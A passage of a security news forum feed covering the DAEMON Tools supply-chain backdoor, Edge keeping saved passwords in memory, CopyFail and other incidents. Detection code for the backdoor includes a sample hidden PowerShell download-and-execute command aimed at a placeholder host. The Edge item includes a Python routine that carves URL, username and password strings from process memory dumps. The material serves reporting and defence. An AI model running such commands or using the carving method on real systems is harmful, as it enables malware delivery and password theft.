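    {"host": "ws-01", "name": "DAEMON Tools Lite", "version": "12.5.0.2430", "install_date": "2026-04-12"},
    {"host": "ws-02", "name": "DAEMON Tools Lite", "version": "12.5.1", "install_date": "2026-04-20"},
    {"host": "ws-03", "name": "DAEMON Tools Lite", "version": "12.6.0.2445", "install_date": "2026-05-06"},
    {"host": "ws-04", "name": "DAEMON Tools Lite", "version": "12.5.0.2410", "install_date": "2026-03-30"},
    {"host": "ws-04", "name": "7-Zip", "version": "24.08", "install_date": "2026-04-10"},
]
EVENTS = [
    {"pid": 4120, "image": r"C:\Program Files\DAEMON Tools Lite\DTHelper.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "DTHelper.exe"},
    {"pid": 4188, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\DAEMON Tools Lite\DTHelper.exe",
     "command_line": "powershell -nop -w hidden -c IEX((New-Object Net.WebClient).DownloadString('https://example.invalid/s1'))"},
    {"pid": 4201, "image": r"C:\Users\alice\AppData\Local\Temp\svchelper.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "command_line": "svchelper.exe"},
    {"pid": 4300, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Program Files\DAEMON Tools Lite\DTShellHlp.exe", "command_line": "notepad.exe"},
    {"pid": 5010, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "WINWORD.EXE"},
]
FINDINGS = audit_inventory(INVENTORY)
HITS = triage_process_events(EVENTS)
```

<p>
	The inventory pass is deliberately conservative: an install from the campaign window that only reports "12.5.1" is flagged for a build-number check rather than cleared, because the signature on those installers was valid and the build number is the only reliable discriminator the reports give. The event triage is a first filter for the behaviours named in the report, not a signature for the malware; code injection into notepad.exe, for instance, is only visible here as the unusual parent, and the outbound traffic to the look-alike domain has to be checked against DNS and proxy logs separately.
</p>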

<p>
	 
</p>

<p>
	The <a href="https://securelist.com/tr/daemon-tools-backdoor/119654/" rel="external nofollow">DAEMON Tools compromise</a> demonstrates how attackers continue to refine supply chain tactics, combining large-scale distribution with precise targeting. With trusted software increasingly becoming an entry point for advanced threats, organisations must treat even legitimate, validly signed applications as potential risk vectors and adopt layered, proactive defence strategies.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/daemon-tools-supply-chain-attack-ongoing-since-april-thousands-affected/" rel="external nofollow">Source</a>
</p>
]]></description><guid isPermaLink="false">34878</guid><pubDate>Wed, 06 May 2026 11:16:40 +0000</pubDate></item><item><title>Edge may reportedly leak all your passwords easily and Microsoft says it's "by design"</title><link>https://nsaneforums.com/news/security-privacy-news/edge-may-reportedly-leak-all-your-passwords-easily-and-microsoft-says-its-by-design-r34867/</link><description><![CDATA[<h3>
	Edge holds saved passwords decrypted in memory from startup; a tool has been released to test for the behaviour.
</h3>

<p>
	A cybersecurity researcher has released a proof-of-concept (PoC) tool highlighting how saved passwords are handled in Microsoft Edge. The researcher, known online as Tom Jøran Sønstebyseter Rønning, shared his findings on X alongside a working demonstration.
</p>

<p>
	 
</p>

<p>
	According to the post, Microsoft Edge loads saved user credentials into process memory in plaintext at startup, even when those credentials are not in use, and it still asks you to re-authenticate before it will reveal a saved password even though it already holds every one of them unprotected in RAM.
</p>

<p>
	 
</p>

<p>
	To demonstrate the behavior, the researcher published a tool on GitHub titled "EdgeSavedPasswordsDumper". The project is described as an educational utility designed to help security professionals and users verify how stored credentials are managed within the browser environment. The tool works by reading the browser's process memory, where usernames and passwords may be stored in readable form.
</p>

<p>
	 
</p>

<p>
	According to the researcher's observations, the parent (browser) process of Microsoft Edge consistently holds decrypted credentials, making it a target for extraction by anyone who can read that process's memory. Organisations running shared or multi-user systems may be particularly affected, as a compromised account with administrative privileges could read the Edge processes of every user with an active session.
</p>

<p>
	 
</p>

<p>
	The technique is not a remote exploit on its own; it matters once an attacker already has code running on the system. The practical caveat is that the bar is lower than "administrator": on Windows, a process running as a given user can read the memory of that user's other processes without elevation, so malware running under the logged-in account can dump that user's Edge process, and administrative rights only extend the reach to other users' sessions. In either case, ordinary administrative and debugging tools are enough to take the memory dump.
</p>
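<p>
	Stripped of the Windows API calls, what such a tool does is read the browser process's memory and look for readable strings. As an added illustration, not the researcher's EdgeSavedPasswordsDumper, the Python below carves UTF-16LE and ASCII strings from a memory snapshot and pairs each URL with the strings that follow it closely, which is how a decrypted login record shows up in a dump. It runs on a constructed byte blob; the origin, username and password in it are made up, and the proximity heuristic is the editor's.
</p>

```python
import re

URL_LIKE = re.compile(r"^https?://", re.I)


def carve_strings(blob: bytes, min_len: int = 8) -> list:
    """Carve printable strings from a memory snapshot as (offset, encoding, text).
    UTF-16LE is the encoding that matters on Windows: Chromium's credential
    records and most Win32 string data are stored that way, so a plain ASCII
    'strings' pass misses them."""
    found = []
    utf16 = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    ascii_ = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for m in utf16.finditer(blob):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16le")))
    for m in ascii_.finditer(blob):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    return sorted(found)


def find_credential_candidates(blob: bytes, window: int = 256) -> list:
    """Pair each URL-like string with the strings carved within `window` bytes after it.
    A decrypted login record tends to keep origin, username and password close
    together, so this is a cheap first pass over a dump. It is a heuristic, not a
    parser of the browser's structures, and will produce noise on a real dump."""
    strings = carve_strings(blob)
    candidates = []
    for offset, _enc, text in strings:
        if not URL_LIKE.match(text):
            continue
        nearby = [t for o, _e, t in strings if offset < o <= offset + window and not URL_LIKE.match(t)]
        if nearby:
            candidates.append({"origin": text, "nearby": nearby})
    return candidates


def _u16(text: str) -> bytes:
    return text.encode("utf-16le")


# Constructed snapshot standing in for a region of the browser process's memory:
# one decrypted record (origin, username, password) surrounded by binary filler.
# A real snapshot comes from ReadProcessMemory or a minidump of the target process,
# which the same user account or an administrator can take.
SNAPSHOT = (
    b"\x00" * 64 + b"\x90\x12\x3c"
    + _u16("https://mail.example.test/login") + b"\x00\x00"
    + _u16("alice@example.test") + b"\x00\x00"
    + _u16("CorrectHorseBattery9") + b"\x00" * 300
    + b"unrelated_ascii_marker" + b"\x00" * 32
)
CANDIDATES = find_credential_candidates(SNAPSHOT)
```

<p>
	The point of the exercise is the threat model it makes concrete: once the secrets sit decrypted in a process that the user's own code can read, the re-authentication prompt in the browser's settings page is a usability feature, not a security boundary, and the only controls that still count are those that keep untrusted code off the account in the first place.
</p>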

<div data-oembed-url="https://x.com/L1v1ng0ffTh3L4N/status/2051308329880719730">
	<blockquote align="center" class="QuoteNewsStyle" data-dnt="true">
		<p dir="ltr" lang="en">
			Microsoft Edge loads all your saved passwords into memory in cleartext — even when you’re not using them. <a href="https://t.co/ci0ZLEYFLB" rel="external nofollow">pic.twitter.com/ci0ZLEYFLB</a>
		</p>

		<p>
			 
		</p>
		— Tom Jøran Sønstebyseter Rønning (@L1v1ng0ffTh3L4N) <a href="https://twitter.com/L1v1ng0ffTh3L4N/status/2051308329880719730?ref_src=twsrc%5Etfw" rel="external nofollow">May 4, 2026</a>
	</blockquote>
</div>

<p>
	Interestingly, the issue appears to be specific to Edge among the Chromium-based browsers: during testing, the researcher reported that alternatives such as Google Chrome and Brave did not exhibit the same behavior, decrypting credentials only when they are needed rather than holding them in memory persistently. That is not to say Chrome is flawless: we recently covered <a href="https://www.neowin.net/news/report-google-chrome-lacks-a-very-important-feature-microsoft-edge-firefox-brave-have/" rel="external nofollow">fingerprinting protection</a>, something Google's browser lacks.
</p>

<p>
	 
</p>

<p>
	Bizarrely, perhaps, Microsoft categorized this behavior as "by design" when the researcher reported it to the company. Nothing beyond that was apparently said by Microsoft.
</p>

<p>
	 
</p>

<p>
	<em>Thanks for the tip, <a href="https://www.neowin.net/forum/profile/50011-goretsky/" rel="external nofollow">Aryeh Goretsky</a>!!!</em>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/edge-may-reportedly-leak-all-your-passwords-easily-and-microsoft-says-its-by-design/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Wednesday 6 May 2026 at 7:39 am AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts: 2023 5,800+ | 2024 5,700+ | 2025 5,700+ | 2026 (to end of April) 1,700</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">34867</guid><pubDate>Tue, 05 May 2026 21:40:20 +0000</pubDate></item><item><title>Widely used Daemon Tools disk app backdoored in monthlong supply-chain attack</title><link>https://nsaneforums.com/news/security-privacy-news/widely-used-daemon-tools-disk-app-backdoored-in-monthlong-supply-chain-attack-r34866/</link><description><![CDATA[<h3>
	Daemon Tools users: It’s time to check your machines for stealthy infections, stat.
</h3>

<p>
	Daemon Tools, a widely used app for mounting disk images, has been backdoored in a monthlong compromise that has pushed malicious updates from the servers of its developer, researchers said Tuesday.
</p>

<p>
	 
</p>

<p>
	Kaspersky, the security firm <a href="https://securelist.com/tr/daemon-tools-backdoor/119654/" rel="external nofollow">reporting</a> the supply-chain attack, said it began on April 8 and remained active as of the time its post went live. Installers that are signed by the developer’s official digital certificate and downloaded from its website infect Daemon Tools executables, causing the malware to run at boot time. Kaspersky didn’t explicitly say so, but based on technical details, the infected versions appear to be only those that run on Windows. Versions 12.5.0.2421 through 12.5.0.2434 are affected. Neither Kaspersky nor developer AVB could be contacted immediately for additional details.
</p>

<h2>
	Hard to defend against
</h2>

<p>
	Infected versions contain an initial payload that collects MAC addresses, hostnames, DNS domain names, running processes, installed software, and system locales. The malware sends them to an attacker-controlled server. Thousands of machines in more than 100 countries were targeted. Out of the many machines infected, about 12 of them, belonging to retail, scientific, government, and manufacturing organizations, have received a follow-on payload—an indication that the supply-chain attack targets select groups.
</p>

<p>
	 
</p>

<p>
	The incident is only the latest supply-chain attack. Other such attacks include the poisoning of the <a href="https://arstechnica.com/information-technology/2017/09/ccleaner-malware-outbreak-is-much-worse-than-it-first-appeared/" rel="external nofollow">CCleaner</a> Windows utility in 2017, the <a href="https://arstechnica.com/information-technology/2020/12/russian-hackers-hit-us-government-using-widespread-supply-chain-attack/" rel="external nofollow">SolarWinds</a> app management software for enterprises in 2020, and the <a href="https://arstechnica.com/information-technology/2023/03/massive-supply-chain-attack-with-ties-to-north-korea-hits-users-of-3cx-voice-app/" rel="external nofollow">3CX</a> VoIP client in 2023. Such attacks are hard to defend against because users are infected when they do nothing more than install digitally signed updates available through official channels. In all three cases it took weeks or months before the compromised update distribution channels were discovered.
</p>

<p>
	 
</p>

<p>
	“Based on our long-term experience of analyzing supply chain attacks, we can conclude that attackers orchestrated the DAEMON Tools compromise in a highly sophisticated manner,” Kaspersky researchers wrote. “For example, the time it took to detect this attack, which turned out to be about one month, is comparable to the 3CX supply chain attack which we researched together with the cybersecurity community in 2023. Given the high complexity of the attack, it is paramount for organizations to carefully examine machines that had DAEMON Tools installed, for abnormal cybersecurity-related activities that occurred on or after April 8.”
</p>

<p>
	 
</p>

<p>
	One of the follow-on payloads pushed to about a dozen organizations was what Kaspersky described as a “minimalistic backdoor.” It has the ability to execute commands, download files, and run shellcode payloads in memory—making the infection harder to detect.
</p>

<p>
	 
</p>

<p>
	Kaspersky said that it observed a more complex backdoor dubbed QUIC RAT, installed on a single machine belonging to an educational institution located in Russia. Initial analysis found that it can inject payloads into the notepad.exe and conhost.exe processes and supports a variety of C2 communication protocols, including HTTP, UDP, TCP, WSS, QUIC, DNS, and HTTP/3.
</p>

<p>
	 
</p>

<p>
	The 100 infected organizations were primarily located in Russia, Brazil, Turkey, Spain, Germany, France, Italy, and China. Kaspersky’s visibility into the attack is limited because it’s based solely on telemetry provided by its own products.
</p>

<p>
	 
</p>

<p>
	Kaspersky researchers wrote:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		The analysis shows that 10% of the affected systems belong to businesses and organizations. Attackers attempted to infect most of the affected machines only with the information collector payload. However, the other backdoor payload, which is more complex, has been observed only on a dozen machines of government, scientific, manufacturing and retail organizations located in Russia, Belarus and Thailand. This manner of deploying the backdoor to a small subset of infected machines clearly indicates that the attacker had intentions to conduct the infection in a targeted manner. However, their intent – whether it is cyberespionage or ‘big game hunting’ – is currently unclear.
	</p>
</blockquote>

<p>
	More recent supply-chain attacks have hit <a href="https://arstechnica.com/information-technology/2026/04/why-a-recent-supply-chain-attack-singled-out-security-firms-checkmarx-and-bitwarden/" rel="external nofollow">Trivy, Checkmarx, and Bitwarden</a> and more than <a href="https://arstechnica.com/security/2026/03/supply-chain-attack-using-invisible-code-hits-github-and-other-repositories/" rel="external nofollow">150 packages</a> available through open source repositories. Last year, there were at least six notable such attacks.
</p>

<p>
	 
</p>

<p>
	Anyone who uses Daemon Tools should take time to scan the entirety of their machines using reputable antivirus software. Windows users should additionally check for indicators of compromise listed in the Kaspersky post. For more technically advanced users, Kaspersky recommends monitoring “suspicious code injections into legitimate system processes, especially when the source is executables launched from publicly accessible directories such as Temp, AppData, or Public.”
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2026/05/widely-used-daemon-tools-disk-app-backdoored-in-monthlong-supply-chain-attack/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Wednesday 6 May 2026 at 7:38 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">34866</guid><pubDate>Tue, 05 May 2026 21:39:16 +0000</pubDate></item><item><title>Google now offers up to $1.5 million for some Android exploits</title><link>https://nsaneforums.com/news/security-privacy-news/google-now-offers-up-to-15-million-for-some-android-exploits-r34865/</link><description><![CDATA[<p>
	Google overhauls its Android and Chrome vulnerability rewards programs, offering bounties of up to $1.5 million for the most difficult exploits while scaling back payouts for flaws that artificial intelligence (AI) has made easier to find.
</p>

<p>
	 
</p>

<p>
	The top reward of $1.5 million is reserved for zero-click Pixel Titan M2 security chip full-chain exploits with persistence, the most technically demanding attack scenario in the program, while the same exploits, but without persistence, are also eligible for up to $750,000.
</p>

<p>
	 
</p>

<p>
	On the Google Chrome side, full-chain browser process exploits on up-to-date operating systems and hardware now come with rewards of up to $250,000, plus an additional $250,128 bonus for successfully exploiting MiraclePtr-protected memory allocations.
</p>

<p>
	 
</p>

<p>
	"We know that certain particularly impactful exploits remain incredibly difficult to achieve and we've greatly appreciated collaborating with the researcher community to discover and unearth them," <a href="https://bughunters.google.com/blog/evolving-the-android-chrome-vrps-for-the-ai-era" rel="external nofollow" target="_blank">Google said</a>.
</p>

<p>
	 
</p>

<p>
	"We want to build on this partnership by continuing to emphasize the highest tiers of rewards across both Android and Chrome."
</p>

<p>
	 
</p>

<p>
	For the Chrome program, Google shifts its focus to concise reports containing only bug proofs and essential artifacts, rather than lengthy written analyses that AI can now generate automatically.
</p>

<p>
	 
</p>

<p>
	The Android program will also narrow its focus to Linux kernel vulnerabilities in Google-maintained components, unless researchers can demonstrate concrete exploitability on Android devices.
</p>

<p>
	 
</p>

<p>
	"While AI has made it effortless to produce lengthy, detailed write-ups, our internal tooling has also evolved to help us automatically explain and suggest fixes for bugs," the company added.
</p>

<p>
	 
</p>

<p>
	This vulnerability rewards program restructuring follows a record year for Google's bug bounty effort, with the company <a href="https://www.bleepingcomputer.com/news/google/google-paid-171-million-for-vulnerability-reports-in-2025/" rel="external nofollow" target="_blank">paying $17.1 million</a> to 747 researchers in 2025, a more than 40 percent increase from 2024 and an all-time high.
</p>

<p>
	 
</p>

<p>
	This has brought the total payouts since the program <a href="https://security.googleblog.com/2010/11/rewarding-web-application-security.html" rel="external nofollow" target="_blank">launched in 2010</a> to more than $81.6 million, and Google estimates that the total aggregate rewards paid in 2026 will increase despite reductions in some individual reward amounts.
</p>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/google-now-offers-up-to-15-million-for-some-android-exploits/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Wednesday 6 May 2026 at 7:37 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">34865</guid><pubDate>Tue, 05 May 2026 21:38:28 +0000</pubDate></item><item><title>Microsoft Defender flagging "Cerdigent" trojan malware on Windows 11, Server PCs worldwide</title><link>https://nsaneforums.com/news/security-privacy-news/microsoft-defender-flagging-cerdigent-trojan-malware-on-windows-11-server-pcs-worldwide-r34833/</link><description><![CDATA[<h3>
	Defender flags “Cerdigent” alerts on Windows tied to the DigiCert breach, which involved the misuse of legitimate code-signing certs.
</h3>

<p>
	A wave of recent alerts from Microsoft Defender identifying a threat labeled “Cerdigent” on Windows systems is drawing the attention of users and security researchers worldwide, with early evidence suggesting the detections may be tied to the abuse of mis-issued digital certificates rather than a real malware campaign.
</p>

<p>
	 
</p>

<p>
	According to a report filed in Mozilla’s Bugzilla tracking system, the root of the issue lies in a security incident involving certificate authority DigiCert. The report suggests that a threat actor gained limited access to DigiCert’s internal support systems after compromising a support analyst’s machine. This access allowed the attacker to get initialisation codes for "a limited number of code signing certificates."
</p>

<p>
	 
</p>

<p>
	These codes, when combined with approved orders, were sufficient to generate legitimate code-signing certificates that were used to sign software so that it appears trustworthy to operating systems like Windows and anti-virus products like Defender.
</p>

<p class="img-center">
	<img alt="Cerdigent trojan malware detected on Defender" class="ipsImage" height="450" width="720" src="https://cdn.neowin.com/news/images/uploaded/2026/05/1777823171_windows_defender_cerdigent_malware.webp">
</p>

<p>
	DigiCert investigated and revoked 60 certificates it found being used by the Zhong stealer malware. In its full incident report on Bugzilla, DigiCert explained: "During our investigation between 2026-04-14 and 2026-04-17, as DigiCert identified certificates potentially affected by the threat actor's actions, we revoked them. DigiCert revoked 60 certificates issued from the following CAs:
</p>

<p>
	 
</p>

<ul>
	<li>
		DigiCert Trusted G4 Code Signing RSA4096 SHA256 2021 CA1
	</li>
	<li>
		DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1
	</li>
	<li>
		GoGetSSL G4 CS RSA4096 SHA256 2022 CA-1
	</li>
	<li>
		Verokey High Assurance Secure Code EV
	</li>
</ul>

<p>
	 
</p>

<p>
	27 of the revoked certificates were explicitly linked to the threat actor (11 were identified in certificate problem reports provided to DigiCert by community members linking the certificates to malware, and 16 were identified during our own investigation). ... In addition to the 27 identified above, 33 of the 60 total certificates were revoked during our own investigation as a precautionary measure. ... The exploited certificates identified by the community member were found to have been used to sign the "Zhong Stealer" malware family."
</p>

<p>
	 
</p>

<p>
	Thus, for now, available information suggests that many Cerdigent alerts may not indicate an active infection but rather a false alarm. Microsoft's own threat database does not say much about it except that "Cerdigent.A!dha can perform a number of actions of a malicious actor's choice on your device."
</p>

<p>
	 
</p>

<p>
	Since code-signing certificates play a key role in the trust model of modern operating systems, when they are compromised they can blur the line between legitimate and malicious software. If you are encountering such warnings, you are advised to monitor updates from security vendors, as signature corrections are often issued quickly in cases of widespread false positives, which seems to be the case here too.
</p>

<p>
	 
</p>

<p>
	Source: <a automate_uuid="0faf46a7-59d3-4f41-90c2-4b0d08b8c7ba" href="https://bugzilla.mozilla.org/show_bug.cgi?id=2033170" rel="external nofollow">Bugzilla@Mozilla</a>
</p>

<p>
	 
</p>

<p>
	<em>Thanks for the tip, <a automate_uuid="98f7f273-58ac-40df-b9ac-1e8de0700b55" href="https://www.neowin.net/forum/profile/50011-goretsky/" rel="external nofollow">Aryeh Goretsky</a>!!!</em>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.neowin.net/news/microsoft-defender-flagging-cerdigent-trojan-malware-on-windows-11-server-pcs-worldwide/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Monday 4 May 2026 at 7:26 am AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">34833</guid><pubDate>Sun, 03 May 2026 21:27:18 +0000</pubDate></item><item><title>The most severe Linux threat to surface in years catches the world flat-footed</title><link>https://nsaneforums.com/news/security-privacy-news/the-most-severe-linux-threat-to-surface-in-years-catches-the-world-flat-footed-r34796/</link><description><![CDATA[<h3>
	CopyFail threatens multi-tenant servers, CI/CD workflows, Kubernetes containers, and more.
</h3>

<p>
	Publicly released exploit code for an effectively unpatched vulnerability that gives root access to virtually all releases of Linux is setting off alarm bells as defenders scramble to ward off severe compromises inside data centers and on personal devices.
</p>

<p>
	 
</p>

<p>
	The vulnerability and the code that exploits it were <a href="https://copy.fail/#contact" rel="external nofollow">released Wednesday evening</a> by researchers from security firm Theori, five weeks after privately disclosing it to the Linux kernel security team. The team patched the vulnerability in versions <a href="https://github.com/torvalds/linux/commit/a664bf3d603dc3bdcf9ae47cc21e0daec706d7a5" rel="external nofollow">7.0</a>, <a href="https://git.kernel.org/stable/c/ce42ee423e58dffa5ec03524054c9d8bfd4f6237" rel="external nofollow">6.19.12</a>, <a href="https://git.kernel.org/stable/c/fafe0fa2995a0f7073c1c358d7d3145bcc9aedd8" rel="external nofollow">6.18.12</a>, 6.12.85, 6.6.137, 6.1.170, 5.15.204, and 5.10.254, but few of the Linux distributions had incorporated those fixes at the time the exploit was released.
</p>

<h2>
	A single script hacks all distros
</h2>

<p>
	The critical flaw, tracked as CVE-2026-31431 and named CopyFail, is a local privilege escalation, a vulnerability class that allows unprivileged users to elevate themselves to administrators. CopyFail is particularly severe because it can be exploited with a single piece of exploit code—released in Wednesday’s disclosure—that works across all vulnerable distributions with no modification. With that, an attacker can, among other things, hack multi-tenant systems, break out of containers based on Kubernetes or other frameworks, and create malicious pull requests that pipe the exploit code through <a href="https://en.wikipedia.org/wiki/CI/CD" rel="external nofollow">CI/CD</a> workflows.
</p>

<p>
	 
</p>

<p>
	“‘Local privilege escalation’ sounds dry, so let me unpack it,” researcher Jorijn Schrijvershof <a href="https://jorijn.com/en/blog/copy-fail-cve-2026-31431-linux-kernel-bug-explained/" rel="external nofollow">wrote Thursday</a>. “It means: an attacker who already has some way to run code on the machine, even as the most boring unprivileged user, can promote themselves to root. From there they can read every file, install backdoors, watch every process, and pivot to other systems.”
</p>

<p>
	 
</p>

<p>
	Schrijvershof added that the same Python script Theori released works reliably for Ubuntu 22.04, Amazon Linux 2023, SUSE 15.6, and Debian 12. The researcher continued:
</p>

<blockquote class="QuoteNewsStyle">
	<p>
		Why does that matter on shared infrastructure? Because “local” covers a lot of ground in 2026: every container on a shared Kubernetes node, every tenant on a shared hosting box, every CI/CD job that runs untrusted pull-request code, every WSL2 instance on a Windows laptop, every containerised AI agent given shell access. They all share one Linux kernel with their neighbours. A kernel LPE collapses that boundary.
	</p>

	<p>
		 
	</p>

	<p>
		The realistic threat chain looks like this. An attacker exploits a known WordPress plugin vulnerability and gets shell access as www-data. They run the copy.fail PoC. They are now root on the host. Every other tenant is suddenly reachable, in the way I walked through in this hack post-mortem. The vulnerability does not get the attacker onto the box; it changes what happens in the next ten seconds after they land there.
	</p>
</blockquote>

<p>
	The vulnerability stems from a “straight-line” logic flaw in the kernel’s crypto API. Many exploits targeting <a href="https://portswigger.net/web-security/race-conditions" rel="external nofollow">race conditions</a> and memory corruption flaws don’t consistently succeed across kernel versions or distributions, and sometimes not even on the same machine. Because the code released for CopyFail exploits a logic flaw, “reliability isn’t probabilistic, and the same script works across distributions,” researchers from Bugcrowd <a href="https://www.bugcrowd.com/blog/what-we-know-about-copy-fail-cve-2026-31431/" rel="external nofollow">wrote</a>. “No race window, no kernel offset.”
</p>

<p>
	 
</p>

<p>
	CopyFail gets its name because the authencesn AEAD template process (used for IPsec extended sequence numbers) doesn’t actually copy data when it should. Instead, it “uses the caller’s destination buffer as a scratch pad, scribbles 4 bytes past the legitimate output region, and never restores them,” Theori said. “The ‘copy’ of the AAD ESN bytes ‘fails’ to stay inside the destination buffer.”
</p>

<h2>
	The worst Linux vulnerability in years
</h2>

<p>
	Other security experts echoed the perspective that CopyFail poses a serious threat, with one <a href="https://seclists.org/oss-sec/2026/q2/283" rel="external nofollow">saying</a> it’s the “worst make-me-root vulnerabilities in the kernel in recent times.”
</p>

<p>
	 
</p>

<p>
	The most recent such Linux vulnerabilities were <a href="https://arstechnica.com/information-technology/2022/03/linux-has-been-bitten-by-its-most-high-severity-vulnerability-in-years/" rel="external nofollow">Dirty Pipe</a> in 2022 and <a href="https://arstechnica.com/information-technology/2016/10/most-serious-linux-privilege-escalation-bug-ever-is-under-active-exploit/" rel="external nofollow">Dirty Cow</a> in 2016. Both of those vulnerabilities were <a href="https://nvd.nist.gov/vuln/detail/cve-2022-0847" rel="external nofollow">actively exploited</a> in the wild.
</p>

<p>
	 
</p>

<p>
	Linux distributors frequently stick with older kernel versions and backport fixes into them. There’s no indication in the disclosure deadline that Theori ever contacted the distributors. With the exploit available before fixed distributions were available, the disclosure amounts to something very similar to a zero-day vulnerability being dropped, although the stiffer term is probably “zero-day patch gap.”
</p>

<p>
	 
</p>

<p>
	“The org doing the disclosure… did an absolutely terrible job of vulnerability coordination,” <a href="https://infosec.exchange/@wdormann/" rel="external nofollow">Will Dormann</a>, a senior principal vulnerability analyst at Tharros Labs, said in an interview. “What is mind boggling to me is that in their writeup they both: A) list 4 affected vendors, and B) tell readers to apply vendor patches. But before firing away with the publication, they didn’t bother to see if ANY of the vendors that they list ACTUALLY HAVE PATCHES. (None do).”
</p>

<p>
	 
</p>

<p>
	Theori representatives did not respond when asked to comment.
</p>

<p>
	 
</p>

<p>
	Distributions known to have patched the vulnerability included <a href="https://ubuntu.com/security/CVE-2026-31431" rel="external nofollow">Arch Linux</a> and <a href="https://bugzilla.redhat.com/show_bug.cgi?id=2460538" rel="external nofollow">RedHat Fedora</a>. Those known to have released mitigation guidance at the time this post went live include:
</p>

<p>
	 
</p>

<ul>
	<li>
		<a href="https://www.suse.com/security/cve/CVE-2026-31431.html" rel="external nofollow">SUSE</a>
	</li>
	<li>
		<a href="https://access.redhat.com/security/cve/cve-2026-31431" rel="external nofollow">RedHat</a>
	</li>
	<li>
		<a href="https://ubuntu.com/security/CVE-2026-31431" rel="external nofollow">Ubuntu</a>
	</li>
</ul>

<p>
	 
</p>

<p>
	People seeking the status of other distributions should check with the respective vendors.
</p>

<p>
	 
</p>

<p>
	Theori said that it discovered the vulnerability after its researcher, Taeyang Lee, found surface area in the crypto subsystem (specifically, splice() hands page-cache pages and scatterlist page provenance) had been underexplored. Using its AI-powered <a href="https://xint.io/products/xint-code" rel="external nofollow">Xint code</a> security tool, the researchers then found the bug after about an hour of scan time. The company said it has also developed an exploit that uses CopyFail to break out of Kubernetes containers.
</p>

<p>
	 
</p>

<p>
	The severity of the threat posed by CopyFail and the likelihood of active exploitation are high enough that all Linux users should investigate their systems immediately. Individual distributors provide useful mitigation guidance, as does the post by Schrijvershof linked above.
</p>

<p>
	 
</p>

<p>
	<a href="https://arstechnica.com/security/2026/04/as-the-most-severe-linux-threat-in-years-surfaces-the-world-scrambles/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Posted Friday 1 May 2026 at 12:12 pm AEST (my time).</em></span>
</p>

]]></description><guid isPermaLink="false">34796</guid><pubDate>Fri, 01 May 2026 02:14:04 +0000</pubDate></item><item><title>UK government ignores data leak warnings as MPs back online digital checkpoints</title><link>https://nsaneforums.com/news/security-privacy-news/uk-government-ignores-data-leak-warnings-as-mps-back-online-digital-checkpoints-r34771/</link><description><![CDATA[<h3>
	The Open Rights Group warns that the Children and Schools Wellbeing Bill will force millions to hand over personal data to access everyday services.
</h3>

<p>
	The digital liberties organization, Open Rights Group, has warned that the UK government is risking the creation of a system of digital checkpoints. The warning comes after MPs backed the Children and Schools Wellbeing Bill that seeks to expand age identification across online platforms, rather than just to prevent access to adult content.
</p>

<p>
	 
</p>

<p>
	ORG <a automate_uuid="84507887-920a-474c-89a6-5c45a235ef36" href="https://www.openrightsgroup.org/press-releases/papers-please-mps-back-mass-online-digital-id-checkpoints/" rel="external nofollow">said</a> that as age identification expands, millions more people will have to hand over personal data to access everyday services. Concerns center on weak safeguards for user data, data reuse, and the possibility of fraud if user data is stolen. Just this week, medical information of over 500,000 participants of the UK Biobank science programme was found for sale on China’s Alibaba, and it’s not the only incident of data loss related to the UK government.
</p>

<p>
	 
</p>

<p>
	James Baker, Platform Power Programme Manager at ORG, said that in less than a year, the UK has gone from checking IDs for porn to the prospect of checking ID to access social media or unlock features such as livestreams or algorithmic feeds. He also pointed to this <a automate_uuid="2d733a1c-21e8-467b-950f-924e591f5b70" href="https://uk.news.yahoo.com/most-australian-teens-admit-social-111400429.html" rel="external nofollow">news story</a> showing that government-mandated social media bans like those seen in Australia are being sidestepped with face masks and their parents’ ID.
</p>

<p>
	 
</p>

<p>
	Another worry held by groups like ORG is that children will start using more seedy platforms that don’t enforce checks and potentially connect children and pedophiles in <a automate_uuid="afbe2904-64e2-467c-b5ab-a1d512fabdd4" href="https://www.neowin.net/news/telegram-faces-uk-ban-threat-as-ofcom-launches-massive-safety-investigation/" rel="external nofollow">unregulated chats</a>. This is the type of argument we’ve <a automate_uuid="bfec6c37-d2ef-4d30-8685-1ab42eb35809" href="https://www.reuters.com/world/asia-pacific/australian-pm-albanese-says-social-media-firms-now-have-responsibility-protect-2024-11-28/" rel="external nofollow">heard peddled by Big Tech</a>, which says it already has safeguards in place.
</p>

<p>
	 
</p>

<p>
